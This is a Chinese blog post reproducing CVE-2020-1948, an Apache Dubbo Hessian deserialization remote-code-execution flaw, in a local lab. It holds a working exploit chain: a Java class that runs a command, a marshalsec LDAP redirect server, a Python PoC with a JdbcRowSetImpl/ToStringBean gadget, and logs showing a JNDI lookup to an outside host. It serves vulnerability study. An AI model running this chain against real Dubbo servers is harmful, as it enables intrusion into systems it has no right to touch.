[CVE-2020-1948]Apache Dubbo Provider默认反序列化RCE

最新推荐文章于 2024-07-03 11:48:48 发布
最新推荐文章于 2024-07-03 11:48:48 发布
阅读量5.2k 收藏 3
点赞数 1
分类专栏: java 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/106934770
版权
安全 同时被 2 个专栏收录
264 篇文章 9 订阅
订阅专栏
java
213 篇文章 3 订阅
订阅专栏

11/16更新

使用这个项目可以启动zookeeper:
https://github.com/apache/dubbo-samples
dubbo-samples-basic
在这里插入图片描述

环境搭建
git clone https://github.com/apache/dubbo-spring-boot-project
cd dubbo-spring-boot-project
git checkout 2.7.1 -b b2.7.1

# 将整个项目dubbo-spring-boot-project导入IDEA
在dubbo-spring-boot-samples/auto-configure-samples/provider-sample/pom.xml

引入以下依赖:

        <dependency>
            <groupId>com.rometools</groupId>
            <artifactId>rome</artifactId>
            <version>1.7.0</version>
        </dependency>

修改默认端口:dubbo-spring-boot-samples/auto-configure-samples/provider-sample/src/main/resources/application.properties
为12347

或者使用这个项目:
https://github.com/apache/dubbo-samples/tree/master/java
中的dubbo-samples-basic,直接执行BasicProvider的main方法即可启动一个带ZooKeeper的dubbo。

命令行启动dubbo的hessian2协议反序列化

2222端口:

[cqq@localhost solr]$ nc -v 127.0.0.1 22222
Ncat: Version 6.40 ( http://nmap.org/ncat )
Ncat: Connected to 127.0.0.1:22222.
   ___   __  __ ___   ___   ____     
  / _ \ / / / // _ ) / _ ) / __ \  
 / // // /_/ // _  |/ _  |/ /_/ /    
/____/ \____//____//____/ \____/   
dubbo>ls
As Provider side:
+----------------------------------------------+---+
|             Provider Service Name            |PUB|
+----------------------------------------------+---+
|org.apache.dubbo.samples.basic.api.DemoService| Y |
+----------------------------------------------+---+
As Consumer side:
+---------------------+---+
|Consumer Service Name|NUM|
+---------------------+---+

dubbo>help
+---------+----------------------------------------------------------------------------------+
|    help | help command                                                                     |
+---------+----------------------------------------------------------------------------------+
|      ls | ls service                                                                       |
+---------+----------------------------------------------------------------------------------+
| offline | offline dubbo                                                                    |
+---------+----------------------------------------------------------------------------------+
|  online | online dubbo                                                                     |
+---------+----------------------------------------------------------------------------------+
|    quit | quit telnet console                                                              |
+---------+----------------------------------------------------------------------------------+
|   start | Judge if service has started?                                                    |
+---------+----------------------------------------------------------------------------------+
| version | version command(show dubbo version)                                              |
+---------+----------------------------------------------------------------------------------+

dubbo>version
dubbo version "2.7.7"
dubbo>quit
BYE!

发现了其启动消息:

[14/04/21 02:14:10:010 PDT] org.apache.dubbo.samples.basic.BasicProvider.main()  INFO server.Server:  [DUBBO] qos-server bind localhost:22222, dubbo version: 2.7.7, current host: 192.168.112.129

原来是:

dubbo 2.5.8 新版本增加了 QOS 模块,提供了新的 telnet 命令支持。

参考:https://dubbo.apache.org/zh/docs/v2.7/user/references/qos/

hessian反序列化的端口默认20880:

发现其启动消息:

[14/04/21 02:14:10:010 PDT] org.apache.dubbo.samples.basic.BasicProvider.main()  INFO transport.AbstractServer:  [DUBBO] Start NettyServer bind /0.0.0.0:20880, export /192.168.112.129:20880, dubbo version: 2.7.7, current host: 192.168.112.129

修改pom.xml文件,
在这里插入图片描述
增加这一行:

 <version>${dubbo.version}</version>

要修改dubbo的版本,可以修改dubbo.version标签。
编译:

mvn clean package

然后启动:

nohup mvn  -Dexec.mainClass=org.apache.dubbo.samples.basic.BasicProvider exec:java &
ExploitMac.java
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
terminal 1
[~/Downloads]$ cat ExploitMac.java                                                                                                [23:55:12]
public class ExploitMac{public ExploitMac(){try{java.lang.Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");}catch(java.io.IOException e){e.printStackTrace();}}}
[~/Downloads]$ vi ExploitMac.java                                                                                                 [23:43:04]
[~/Downloads]$ javac ExploitMac.java                                                                                              [23:43:17]
[~/Downloads]$ python3 -m http.server 8088                                                                                        [23:43:19]
zsh: correct 'http.server' to 'httpserver' [nyae]? n
Serving HTTP on 0.0.0.0 port 8088 (http://0.0.0.0:8088/) ...

127.0.0.1 - - [23/Jun/2020 23:49:27] "GET /ExploitMac.class HTTP/1.1" 200 -
terminal 2
[master][~/GitProjects/marshalsec]$ java -cp ./target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8088/#ExploitMac 8087
Listening on 0.0.0.0:8087
Send LDAP reference result for ExploitMac redirecting to http://127.0.0.1:8088/ExploitMac.class
terminal 3
$ python3 -m pip install dubbo-py
$ python3 dubbo3.py
PoC
from dubbo.codec.hessian2 import new_object
from dubbo.client import DubboClient

client = DubboClient('127.0.0.1', 12347)

JdbcRowSetImpl=new_object(
      'com.sun.rowset.JdbcRowSetImpl',
      dataSource="ldap://127.0.0.1:8087/ExploitMac",
      strMatchColumns=["foo"]
      )
JdbcRowSetImplClass=new_object(
      'java.lang.Class',
      name="com.sun.rowset.JdbcRowSetImpl",
      )
toStringBean=new_object(
      'com.rometools.rome.feed.impl.ToStringBean',
      beanClass=JdbcRowSetImplClass,
      obj=JdbcRowSetImpl
      )

resp = client.send_request_and_return_response(
    service_name='org.apache.dubbo.spring.boot.demo.consumer.DemoService',
    method_name='rce',
    args=[toStringBean])
IDEA报错
2020-06-23 23:49:27.073 ERROR 66497 --- [12347-thread-17] c.rometools.rome.feed.impl.ToStringBean  : Error while generating toString

java.lang.reflect.InvocationTargetException: null
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) ~[na:1.8.0_131]
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) ~[na:1.8.0_131]
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) ~[na:1.8.0_131]
	at java.lang.reflect.Method.invoke(Method.java:498) ~[na:1.8.0_131]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:158) [rome-1.7.0.jar:1.7.0]
	at com.rometools.rome.feed.impl.ToStringBean.toString(ToStringBean.java:129) [rome-1.7.0.jar:1.7.0]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.util.Arrays.toString(Arrays.java:4571) [na:1.8.0_131]
	at org.apache.dubbo.rpc.RpcInvocation.toString(RpcInvocation.java:211) [dubbo-2.7.1.jar:2.7.1]
	at java.lang.String.valueOf(String.java:2994) [na:1.8.0_131]
	at java.lang.StringBuilder.append(StringBuilder.java:131) [na:1.8.0_131]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol.getInvoker(DubboProtocol.java:248) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:103) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:200) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:51) [dubbo-2.7.1.jar:2.7.1]
	at org.apache.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:57) [dubbo-2.7.1.jar:2.7.1]
	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142) [na:1.8.0_131]
	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617) [na:1.8.0_131]
	at java.lang.Thread.run(Thread.java:748) [na:1.8.0_131]
Caused by: java.sql.SQLException: JdbcRowSet (连接) JNDI 无法连接
	at com.sun.rowset.JdbcRowSetImpl.connect(JdbcRowSetImpl.java:634) ~[na:1.8.0_131]
	at com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData(JdbcRowSetImpl.java:4004) ~[na:1.8.0_131]
	... 20 common frames omitted

域名无法解析的情况下:

[28/12/20 11:54:50:050 CST] NettyServerWorker-5-6  WARN dubbo.DubboCodec:  [DUBBO] Decode request failed: Invalid bean definition with name 'ldap://spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca/1' defined in JNDI environment: JNDI lookup failed; nested exception is javax.naming.CommunicationException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca:389 [Root exception is java.net.UnknownHostException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca], dubbo version: 2.7.8, current host: 192.168.85.1
org.springframework.beans.factory.BeanDefinitionStoreException: Invalid bean definition with name 'ldap://spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca/1' defined in JNDI environment: JNDI lookup failed; nested exception is javax.naming.CommunicationException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca:389 [Root exception is java.net.UnknownHostException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca]
	at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:125)
	at org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor.getAdvice(AbstractBeanFactoryPointcutAdvisor.java:119)
	at org.springframework.aop.support.AbstractPointcutAdvisor.equals(AbstractPointcutAdvisor.java:74)
	at java.util.HashMap.putVal(HashMap.java:635)
	at java.util.HashMap.put(HashMap.java:612)
	at com.alibaba.com.caucho.hessian.io.MapDeserializer.doReadMap(MapDeserializer.java:145)
	at com.alibaba.com.caucho.hessian.io.MapDeserializer.readMap(MapDeserializer.java:126)
	at com.alibaba.com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:2733)
	at com.alibaba.com.caucho.hessian.io.Hessian2Input.readObject(Hessian2Input.java:2308)
	at org.apache.dubbo.common.serialize.hessian2.Hessian2ObjectInput.readObject(Hessian2ObjectInput.java:94)
	at org.apache.dubbo.common.serialize.ObjectInput.readEvent(ObjectInput.java:83)
	at org.apache.dubbo.remoting.exchange.codec.ExchangeCodec.decodeEventData(ExchangeCodec.java:400)
	at org.apache.dubbo.rpc.protocol.dubbo.DubboCodec.decodeBody(DubboCodec.java:122)
	at org.apache.dubbo.remoting.exchange.codec.ExchangeCodec.decode(ExchangeCodec.java:122)
	at org.apache.dubbo.remoting.exchange.codec.ExchangeCodec.decode(ExchangeCodec.java:82)
	at org.apache.dubbo.rpc.protocol.dubbo.DubboCountCodec.decode(DubboCountCodec.java:48)
	at org.apache.dubbo.remoting.transport.netty4.NettyCodecAdapter$InternalDecoder.decode(NettyCodecAdapter.java:85)
	at io.netty.handler.codec.ByteToMessageDecoder.decodeRemovalReentryProtection(ByteToMessageDecoder.java:489)
	at io.netty.handler.codec.ByteToMessageDecoder.callDecode(ByteToMessageDecoder.java:428)
	at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:265)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
	at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
	at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1434)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
	at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
	at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:965)
	at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:163)
	at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:647)
	at io.netty.channel.nio.NioEventLoop.processSelectedKeysOptimized(NioEventLoop.java:582)
	at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:499)
	at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:461)
	at io.netty.util.concurrent.SingleThreadEventExecutor$5.run(SingleThreadEventExecutor.java:884)
	at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30)
	at java.lang.Thread.run(Thread.java:748)
Caused by: javax.naming.CommunicationException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca:389 [Root exception is java.net.UnknownHostException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca]
	at com.sun.jndi.ldap.Connection.<init>(Connection.java:226)
	at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137)
	at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
	at com.sun.jndi.ldap.LdapCtx.connect(LdapCtx.java:2749)
	at com.sun.jndi.ldap.LdapCtx.<init>(LdapCtx.java:319)
	at com.sun.jndi.url.ldap.ldapURLContextFactory.getUsingURLIgnoreRootDN(ldapURLContextFactory.java:60)
	at com.sun.jndi.url.ldap.ldapURLContext.getRootURLContext(ldapURLContext.java:61)
	at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:202)
	at com.sun.jndi.url.ldap.ldapURLContext.lookup(ldapURLContext.java:94)
	at javax.naming.InitialContext.lookup(InitialContext.java:417)
	at org.springframework.jndi.JndiTemplate$1.doInContext(JndiTemplate.java:155)
	at org.springframework.jndi.JndiTemplate.execute(JndiTemplate.java:87)
	at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:152)
	at org.springframework.jndi.JndiTemplate.lookup(JndiTemplate.java:179)
	at org.springframework.jndi.JndiLocatorSupport.lookup(JndiLocatorSupport.java:95)
	at org.springframework.jndi.support.SimpleJndiBeanFactory.getBean(SimpleJndiBeanFactory.java:115)
	... 34 more
Caused by: java.net.UnknownHostException: spring.vugbggrhdk.ef35b434242b1c5b0328.d.zhack.ca
	at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:184)
	at java.net.PlainSocketImpl.connect(PlainSocketImpl.java:172)
	at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392)
	at java.net.Socket.connect(Socket.java:589)
	at java.net.Socket.connect(Socket.java:538)
	at java.net.Socket.<init>(Socket.java:434)
	at java.net.Socket.<init>(Socket.java:211)
	at com.sun.jndi.ldap.Connection.createSocket(Connection.java:363)
	at com.sun.jndi.ldap.Connection.<init>(Connection.java:203)
	... 49 more
Wireshak:8087

在这里插入图片描述

Wireshak:12347

在这里插入图片描述

Demo

在这里插入图片描述

参考

  • https://mp.weixin.qq.com/s/iKQbdWrMG00Arg0aEUbrXQ
  • https://www.mail-archive.com/dev@dubbo.apache.org/msg06544.html
caiqiiqi
关注
专栏目录
Apache Dubbo Provider默认反序列化RCE(CVE-2020-1948)复现
玄道的网安博客
03-05 1232
简介 Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 影响版本 Dubbo 2.7.0 - 2.7.6 Dubbo 2.6.0 - 2.6.7 Dubbo 2.5.x 环境搭建 docker 拉取环境 docker pull dsolab/dubbo:cve-2020-1948 docker启动 docker run -p 1...
通过CVE-2021-43297漏洞在Apache Dubbo<=2.7.13下实现RCE
「 虚幻私塾」
01-21 1659
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 目录* 0 前言 1 找源头 1.1 找到触发点 1.2 可用的gadget 1.3 向上推触发点 2 构造poc 2.1 开启HttpServer 2.2 hessian2序列化过程简述 3 poc 4 总结 5 Dubbo<=2.7.13可用的POC
Apache Dubbo 反序列化-(CVE-2020-1948)
tamchikit的博客
01-04 397
Apache Dubbo 反序列化-(CVE-2020-1948)
Dubbo 源码解析 - 序列化与反序列化
最新发布
qq_33240556的博客
07-03 451
Dubbo 通过抽象的接口和 SPI 机制,实现了对多种序列化协议的支持。序列化和反序列化的过程在 Dubbo 中是高度可扩展和可替换的,这使得 Dubbo 可以适应不同的应用场景和性能需求。如果想深入了解 Dubbo 的序列化和反序列化机制,建议仔细阅读相关的源码和官方文档。
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告
爱国小白帽
06-23 3142
CVE-2020-1948: Apache Dubbo 远程代码执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,
Dubbo-CVE-2020-1948
why811的博客
10-07 76
同时我们发现该gadget中用到了com.rometools.rome.feed.impl.ToStringBean,所以Provider的pom.xml中需要添加rometools的引用。Provider将本地提供的远程方法在注册中心进行注册,Consumer需要调用时会先去注册中心进行查询,根据注册中心返回的结果再去对应的Provider中调用对应的远程方法,如果有变更,注册中心将基于长连接推送变更数据给Consumer。同时我们可以留意一下相关的LDAP服务,当出现转发成功的时候,自然也是成功的。
Apache Dubbo CVE-2020-1948 测试环境复现
aweiweiweiei1的博客
01-26 259
https://github.com/txrw/Dubbo-CVE-2020-1948
[CVE-2020-1948] Apache Dubbo 反序列化漏洞分析
小王的储物间
12-13 598
Dubbo 是一款高性能、轻量级的开源 Java RPC 框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
CVE-2020-9484 Tomcat Session 反序列化复现
weixin_45260839的博客
07-01 1779
CVE-2020-9484 Tomcat Session 反序列化复现
Apache Dubbo Provider 远程代码执行漏洞 (CVE-2020-1948)附docker环境
scrooge51的博客
07-07 781
漏洞原理 Dubbo协议默认采用Hessian作为序列化反序列化方式,而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dubbo服务端加载远程恶意类从而执行恶意代码. 影响版本 Apache Dubbo 2.7.0 ~ 2.7.6 Apache Dubbo 2.6.0 ~ 2.6.7 Apache Dubbo 2.5.x 所有版本 (官方不再提供支持) 复现流程 漏洞环境(待审核) 1. 利用docker搭建漏洞环境 //本地创建环境: cd docker/
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1438
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
hessian序列化_dubbo provider 反序列化rce及补丁绕过
weixin_32734143的博客
01-20 219
01漏洞复现代码地址:https://github.com/hex0wn/learn-java-bug/tree/master/dubbo-poc环境:dubbo 2.7.6 + java 8u151 + rome 1.7.0下载测试代码,直接启动 provider开启jndi监听 https://github.com/welk1n/JNDI-Injection-Exploitjava ...
关于Dubbo默认序列化Hessian的问题
goodluck_wgw的博客
06-16 1477
项目中使用了服务框架Dubbo进行远程调用,框架持久层使用的是Spring data jpa,一同事开发的Dubbo接口类似入如下: XXXXService.findBy(PageRequest pg );其中PageRequest 是spring data jps提供的分页排序实现类。 当在客户端调用该接口时,PageRequest 中明明传入的油蚕丝,但一到Dubbo反序列化,Du...
Apache Dubbo CVE-2020-1948 反序列化漏洞利用
weixin_46137328的博客
07-08 2105
0x00 漏洞背景2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为CVE-2020-1948,漏洞等级:高危。...
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3074
Apache Dubbo反序列化漏洞复现分析
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 703
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
CVE-2020-1948补丁绕过 Apache Dubbo 远程代码执行漏洞
AmyBaby00的博客
06-30 1089
漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。 Apache Dubbo Provider 存在 反序列化漏洞,攻击者可以通过RPC请求发送无法识别的服务名称或方法名称以及一些恶意参
Javaweb安全——Dubbo 反序列化(一)
weixin_43610673的博客
02-13 1506
Apache Dubbo 是一款 RPC 服务开发框架。智能容错和负载均衡,以及服务自动注册和发现。
【补丁绕过】CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞通告更新
爱国小白帽
06-30 937
【补丁绕过】CVE-2020-1948 : Apache Dubbo 远程代码执行漏洞通告更新 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月23日, 360CERT监测发现 Apache Dubbo 官方 发布了 Apache Dubbo 远程代码执行 的风险通告,该漏洞编号为 CVE-2020-1948,漏洞等级:高危。 Apache Dubbo 是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接
Yii框架CVE-2020-15148:反序列化RCE漏洞分析与修复
CVE-2020-15148是PHP框架Yii2中的一个严重漏洞,它涉及反序列化过程中的远程命令执行(RCE)。当应用程序不正确地处理用户可控的输入,特别是使用`unserialize()`函数时,攻击者可以构造特定的数据来触发此漏洞,...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值